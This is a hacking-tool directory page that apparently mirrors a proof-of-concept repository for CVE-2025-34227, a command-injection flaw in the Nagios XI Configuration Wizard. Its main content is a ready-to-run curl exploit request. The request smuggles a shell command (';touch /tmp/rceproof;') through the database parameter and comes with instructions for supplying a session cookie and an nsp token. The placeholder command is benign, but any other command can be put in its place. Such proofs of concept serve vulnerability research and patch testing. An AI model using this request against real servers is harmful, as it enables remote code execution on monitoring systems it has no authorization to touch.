Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-34227_Nagios-XI-Command-Injection-Configuration-Wizard — Simple proof of concept repository for CVE-2025-34227 Nagios XI authenticated command injection in Configuration Wizard | Kitploit
Tools/GitHubGitHub/mcorybillington/cve-2025-34227_nagios-xi-command-injection-configuration-wizard
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubmcorybillington/cve-2025-34227_nagios-xi-command-injection-configuration-wizard

CVE-2025-34227_Nagios-XI-Command-Injection-Configuration-Wizard

Simple proof of concept repository for CVE-2025-34227 Nagios XI authenticated command injection in Configuration Wizard

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository
9 months agoNot yet reviewed

CVE-2025-34227 Nagios XI Authenticated Command Injection in Configuration Wizard

Simple proof of concept repository for CVE-2025-34227, an authenticated command injection in Nagios XI -> Configuration Wizard

Full writeup here: https://theyhack.me/CVE-2025-34227-Nagios-XI-Wizard-Command-Injection/

curl Proof of Concept

The payload below is in the database parameter: ;touch /tmp/rceproof;.

After authenticating, add your Cookie: nagiosxi= session id and add your nsp value to the POST body:

root@kitploit:~
$ curl -s \
-H 'Cookie: nagiosxi=<your-session-id-here>' \
--data 'update=1&nsp=<your-nsp-value-here>&step=3&nextstep=5&wizard=mysqlquery&tpl=&hostname=localhost&operation=&selectedhostconfig=&services_serial=&serviceargs_serial=&config_serial=&ip_address=127.0.0.1&port=3306&username=test&password=test&database=information_schema%3Btouch+/tmp/rceproof%3B&queryname=curl+RCE+service&query=SELECT+1&warning=50&check_interval=1&retry_interval=1&critical=200&finishButton=' \
http://192.168.122.9/nagiosxi/config/monitoringwizard.php
Download Tool